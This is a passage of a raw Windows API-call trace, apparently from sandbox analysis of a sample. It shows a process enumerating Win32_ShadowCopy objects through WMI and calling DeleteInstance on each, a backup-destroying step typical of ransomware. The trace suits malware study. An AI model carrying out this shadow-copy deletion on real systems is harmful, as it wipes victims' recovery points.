0x3 [0117.148] WbemDefPath:IWbemPath:SetText (This=0x1be52a10, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x0 [0117.148] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x2 [0117.148] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0117.148] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0117.149] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0117.149] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0117.149] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0117.149] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0117.149] IWbemClassObject:Get (in: This=0x1be52450, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0117.149] SysStringLen (param_1="root\\cimv2") returned 0xa [0117.150] IWbemClassObject:Get (in: This=0x1be52450, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0117.150] SysStringLen (param_1="root\\cimv2") returned 0xa [0117.150] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0117.150] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0117.150] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0117.150] IWbemClassObject:Get (in: This=0x1be52450, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0117.150] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0117.150] IWbemClassObject:Get (in: This=0x1be52450, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0117.150] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0117.151] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52a10, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0117.151] WbemDefPath:IWbemPath:GetText (in: This=0x1be52a10, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0117.151] WbemDefPath:IWbemPath:GetText (in: This=0x1be52a10, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x0 [0117.151] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0117.151] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0117.151] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0117.151] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0117.151] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0117.151] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0117.151] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0117.151] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0117.152] IWbemClassObject:Get (in: This=0x1be52450, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0117.152] WbemDefPath:IWbemPath:GetText (in: This=0x1be52a10, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0117.152] WbemDefPath:IWbemPath:GetText (in: This=0x1be52a10, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x0 [0117.152] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0119.570] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0119.570] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be54ef0, puReturned=0x1c90de18*=0x1) returned 0x0 [0119.571] IUnknown:QueryInterface (in: This=0x1be54ef0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be54ef0) returned 0x0 [0119.571] IUnknown:QueryInterface (in: This=0x1be54ef0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0119.571] IUnknown:QueryInterface (in: This=0x1be54ef0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0119.572] IUnknown:AddRef (This=0x1be54ef0) returned 0x3 [0119.572] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0119.572] IUnknown:QueryInterface (in: This=0x1be54ef0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be54ef8) returned 0x0 [0119.572] IMarshal:GetUnmarshalClass (in: This=0x1be54ef8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0119.572] IUnknown:Release (This=0x1be54ef8) returned 0x3 [0119.572] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0119.572] IUnknown:AddRef (This=0x1be54ef0) returned 0x4 [0119.572] IUnknown:QueryInterface (in: This=0x1be54ef0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0119.572] IUnknown:Release (This=0x1be54ef0) returned 0x3 [0119.573] IUnknown:Release (This=0x1be54ef0) returned 0x2 [0119.573] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0119.573] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0119.573] IUnknown:AddRef (This=0x1be54ef0) returned 0x3 [0119.573] IUnknown:QueryInterface (in: This=0x1be54ef0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be54ef0) returned 0x0 [0119.573] IUnknown:Release (This=0x1be54ef0) returned 0x3 [0119.573] IUnknown:Release (This=0x1be54ef0) returned 0x2 [0119.573] IUnknown:Release (This=0x1be54ef0) returned 0x1 [0119.573] CoTaskMemFree (pv=0x16a900) [0119.573] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0119.573] IUnknown:AddRef (This=0x1be54ef0) returned 0x2 [0119.574] IWbemClassObject:Get (in: This=0x1be54ef0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0119.574] IWbemClassObject:Get (in: This=0x1be54ef0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0119.574] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x53 [0119.574] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0119.574] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0119.574] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0119.574] IUnknown:Release (This=0x142498) returned 0x1 [0119.575] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be51ce0) returned 0x0 [0119.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51ce0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0119.575] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be51ce0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52ad0) returned 0x0 [0119.576] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52ad0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52ad0) returned 0x0 [0119.576] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52ad0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0119.576] WbemDefPath:IUnknown:AddRef (This=0x1be52ad0) returned 0x3 [0119.576] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0119.576] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52ad0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b92a360) returned 0x0 [0119.576] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92a360, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.576] WbemDefPath:IUnknown:Release (This=0x1b92a360) returned 0x3 [0119.577] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0119.577] WbemDefPath:IUnknown:AddRef (This=0x1be52ad0) returned 0x4 [0119.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52ad0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0119.577] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x3 [0119.577] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x2 [0119.577] WbemDefPath:IUnknown:Release (This=0x1be51ce0) returned 0x0 [0119.577] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x1 [0119.577] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0119.577] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0119.577] WbemDefPath:IUnknown:AddRef (This=0x1be52ad0) returned 0x2 [0119.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52ad0, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52ad0) returned 0x0 [0119.578] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x2 [0119.578] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x1 [0119.578] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0119.578] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0119.578] WbemDefPath:IUnknown:AddRef (This=0x1be52ad0) returned 0x2 [0119.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52ad0, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52ad0) returned 0x0 [0119.578] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x2 [0119.578] WbemDefPath:IUnknown:AddRef (This=0x1be52ad0) returned 0x3 [0119.578] WbemDefPath:IWbemPath:SetText (This=0x1be52ad0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x0 [0119.579] WbemDefPath:IUnknown:Release (This=0x1be52ad0) returned 0x2 [0119.579] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0119.579] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0119.579] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.579] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0119.579] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0119.579] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.579] IWbemClassObject:Get (in: This=0x1be54ef0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0119.579] SysStringLen (param_1="root\\cimv2") returned 0xa [0119.579] IWbemClassObject:Get (in: This=0x1be54ef0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0119.579] SysStringLen (param_1="root\\cimv2") returned 0xa [0119.580] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0119.580] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0119.580] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.580] IWbemClassObject:Get (in: This=0x1be54ef0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0119.580] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0119.580] IWbemClassObject:Get (in: This=0x1be54ef0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0119.580] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0119.580] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52ad0, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0119.580] WbemDefPath:IWbemPath:GetText (in: This=0x1be52ad0, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0119.581] WbemDefPath:IWbemPath:GetText (in: This=0x1be52ad0, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x0 [0119.581] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0119.581] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0119.581] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.581] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0119.581] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0119.581] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0119.581] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0119.581] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0119.581] IWbemClassObject:Get (in: This=0x1be54ef0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0119.581] WbemDefPath:IWbemPath:GetText (in: This=0x1be52ad0, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0119.582] WbemDefPath:IWbemPath:GetText (in: This=0x1be52ad0, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x0 [0119.582] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0122.382] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0122.382] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be55590, puReturned=0x1c90de18*=0x1) returned 0x0 [0122.387] IUnknown:QueryInterface (in: 